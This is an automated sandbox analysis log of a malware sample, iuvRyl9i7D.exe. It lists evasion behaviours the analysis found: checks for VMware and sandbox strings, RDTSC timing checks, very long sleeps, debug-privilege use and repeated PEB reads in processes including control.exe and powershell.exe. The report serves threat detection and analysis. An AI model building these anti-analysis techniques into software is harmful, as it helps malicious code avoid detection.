Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe RDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe RDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 0000000000608C04 second address: 0000000000608C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 0000000000608F9E second address: 0000000000608FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe TID: 3608 Thread sleep time: -45733s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe TID: 6208 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6788 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6500 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00408ED0 rdtsc 12_2_00408ED0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7432 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1085 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\control.exe API coverage: 9.2 %
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00611660 FindFirstFileW,FindNextFileW,FindClose, 21_2_00611660
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00611659 FindFirstFileW,FindNextFileW,FindClose, 21_2_00611659
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Thread delayed: delay time: 45733 Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000012.00000000.343652210.00000000051AC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000012.00000000.306952519.0000000005EAB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.306066644.0000000005134000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.328239618.00000000051F3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000012.00000000.306066644.0000000005134000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0cY
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00408ED0 rdtsc 12_2_00408ED0
Enables debug privileges
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460746D mov eax, dword ptr fs:[00000030h] 21_2_0460746D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h] 21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461A44B mov eax, dword ptr fs:[00000030h] 21_2_0461A44B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467C450 mov eax, dword ptr fs:[00000030h] 21_2_0467C450
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467C450 mov eax, dword ptr fs:[00000030h] 21_2_0467C450
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461BC2C mov eax, dword ptr fs:[00000030h] 21_2_0461BC2C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B740D mov eax, dword ptr fs:[00000030h] 21_2_046B740D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B740D mov eax, dword ptr fs:[00000030h] 21_2_046B740D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B740D mov eax, dword ptr fs:[00000030h] 21_2_046B740D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h] 21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h] 21_2_04666C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h] 21_2_04666C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h] 21_2_04666C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h] 21_2_04666C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A14FB mov eax, dword ptr fs:[00000030h] 21_2_046A14FB
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666CF0 mov eax, dword ptr fs:[00000030h] 21_2_04666CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666CF0 mov eax, dword ptr fs:[00000030h] 21_2_04666CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666CF0 mov eax, dword ptr fs:[00000030h] 21_2_04666CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8CD6 mov eax, dword ptr fs:[00000030h] 21_2_046B8CD6
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F849B mov eax, dword ptr fs:[00000030h] 21_2_045F849B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460C577 mov eax, dword ptr fs:[00000030h] 21_2_0460C577
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460C577 mov eax, dword ptr fs:[00000030h] 21_2_0460C577
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04623D43 mov eax, dword ptr fs:[00000030h] 21_2_04623D43
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04663540 mov eax, dword ptr fs:[00000030h] 21_2_04663540
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04693D40 mov eax, dword ptr fs:[00000030h] 21_2_04693D40
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04607D50 mov eax, dword ptr fs:[00000030h] 21_2_04607D50
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0466A537 mov eax, dword ptr fs:[00000030h] 21_2_0466A537
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AE539 mov eax, dword ptr fs:[00000030h] 21_2_046AE539
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04614D3B mov eax, dword ptr fs:[00000030h] 21_2_04614D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04614D3B mov eax, dword ptr fs:[00000030h] 21_2_04614D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04614D3B mov eax, dword ptr fs:[00000030h] 21_2_04614D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8D34 mov eax, dword ptr fs:[00000030h] 21_2_046B8D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h] 21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EAD30 mov eax, dword ptr fs:[00000030h] 21_2_045EAD30
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h] 21_2_046AFDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h] 21_2_046AFDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h] 21_2_046AFDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h] 21_2_046AFDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04698DF1 mov eax, dword ptr fs:[00000030h] 21_2_04698DF1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h] 21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h] 21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h] 21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666DC9 mov ecx, dword ptr fs:[00000030h] 21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h] 21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h] 21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FD5E0 mov eax, dword ptr fs:[00000030h] 21_2_045FD5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FD5E0 mov eax, dword ptr fs:[00000030h] 21_2_045FD5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046135A1 mov eax, dword ptr fs:[00000030h] 21_2_046135A1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B05AC mov eax, dword ptr fs:[00000030h] 21_2_046B05AC
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B05AC mov eax, dword ptr fs:[00000030h] 21_2_046B05AC
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h] 21_2_045E2D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h] 21_2_045E2D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h] 21_2_045E2D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h] 21_2_045E2D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h] 21_2_045E2D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04611DB5 mov eax, dword ptr fs:[00000030h] 21_2_04611DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04611DB5 mov eax, dword ptr fs:[00000030h] 21_2_04611DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04611DB5 mov eax, dword ptr fs:[00000030h] 21_2_04611DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612581 mov eax, dword ptr fs:[00000030h] 21_2_04612581
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612581 mov eax, dword ptr fs:[00000030h] 21_2_04612581
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612581 mov eax, dword ptr fs:[00000030h] 21_2_04612581
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612581 mov eax, dword ptr fs:[00000030h] 21_2_04612581
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461FD9B mov eax, dword ptr fs:[00000030h] 21_2_0461FD9B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461FD9B mov eax, dword ptr fs:[00000030h] 21_2_0461FD9B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h] 21_2_0460AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h] 21_2_0460AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h] 21_2_0460AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h] 21_2_0460AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h] 21_2_0460AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h] 21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h] 21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h] 21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h] 21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h] 21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h] 21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AAE44 mov eax, dword ptr fs:[00000030h] 21_2_046AAE44
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AAE44 mov eax, dword ptr fs:[00000030h] 21_2_046AAE44
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F766D mov eax, dword ptr fs:[00000030h] 21_2_045F766D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469FE3F mov eax, dword ptr fs:[00000030h] 21_2_0469FE3F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EC600 mov eax, dword ptr fs:[00000030h] 21_2_045EC600
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EC600 mov eax, dword ptr fs:[00000030h] 21_2_045EC600
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EC600 mov eax, dword ptr fs:[00000030h] 21_2_045EC600
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04618E00 mov eax, dword ptr fs:[00000030h] 21_2_04618E00
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1608 mov eax, dword ptr fs:[00000030h] 21_2_046A1608
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461A61C mov eax, dword ptr fs:[00000030h] 21_2_0461A61C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461A61C mov eax, dword ptr fs:[00000030h] 21_2_0461A61C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EE620 mov eax, dword ptr fs:[00000030h] 21_2_045EE620
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046116E0 mov ecx, dword ptr fs:[00000030h] 21_2_046116E0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04628EC7 mov eax, dword ptr fs:[00000030h] 21_2_04628EC7
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469FEC0 mov eax, dword ptr fs:[00000030h] 21_2_0469FEC0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046136CC mov eax, dword ptr fs:[00000030h] 21_2_046136CC
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F76E2 mov eax, dword ptr fs:[00000030h] 21_2_045F76E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8ED6 mov eax, dword ptr fs:[00000030h] 21_2_046B8ED6
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046646A7 mov eax, dword ptr fs:[00000030h] 21_2_046646A7
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B0EA5 mov eax, dword ptr fs:[00000030h] 21_2_046B0EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B0EA5 mov eax, dword ptr fs:[00000030h] 21_2_046B0EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B0EA5 mov eax, dword ptr fs:[00000030h] 21_2_046B0EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467FE87 mov eax, dword ptr fs:[00000030h] 21_2_0467FE87
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8F6A mov eax, dword ptr fs:[00000030h] 21_2_046B8F6A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FEF40 mov eax, dword ptr fs:[00000030h] 21_2_045FEF40
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FFF60 mov eax, dword ptr fs:[00000030h] 21_2_045FFF60
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461E730 mov eax, dword ptr fs:[00000030h] 21_2_0461E730
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460B73D mov eax, dword ptr fs:[00000030h] 21_2_0460B73D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460B73D mov eax, dword ptr fs:[00000030h] 21_2_0460B73D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B070D mov eax, dword ptr fs:[00000030h] 21_2_046B070D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B070D mov eax, dword ptr fs:[00000030h] 21_2_046B070D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461A70E mov eax, dword ptr fs:[00000030h] 21_2_0461A70E
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461A70E mov eax, dword ptr fs:[00000030h] 21_2_0461A70E
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E4F2E mov eax, dword ptr fs:[00000030h] 21_2_045E4F2E
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E4F2E mov eax, dword ptr fs:[00000030h] 21_2_045E4F2E
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460F716 mov eax, dword ptr fs:[00000030h] 21_2_0460F716
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467FF10 mov eax, dword ptr fs:[00000030h] 21_2_0467FF10
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467FF10 mov eax, dword ptr fs:[00000030h] 21_2_0467FF10
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046237F5 mov eax, dword ptr fs:[00000030h] 21_2_046237F5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F8794 mov eax, dword ptr fs:[00000030h] 21_2_045F8794
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04667794 mov eax, dword ptr fs:[00000030h] 21_2_04667794
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04667794 mov eax, dword ptr fs:[00000030h] 21_2_04667794
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04667794 mov eax, dword ptr fs:[00000030h] 21_2_04667794
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A2073 mov eax, dword ptr fs:[00000030h] 21_2_046A2073
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B1074 mov eax, dword ptr fs:[00000030h] 21_2_046B1074
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04600050 mov eax, dword ptr fs:[00000030h] 21_2_04600050
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04600050 mov eax, dword ptr fs:[00000030h] 21_2_04600050
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h] 21_2_0461002D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h] 21_2_0461002D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h] 21_2_0461002D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h] 21_2_0461002D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h] 21_2_0461002D
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h] 21_2_0460A830
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h] 21_2_0460A830
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h] 21_2_0460A830
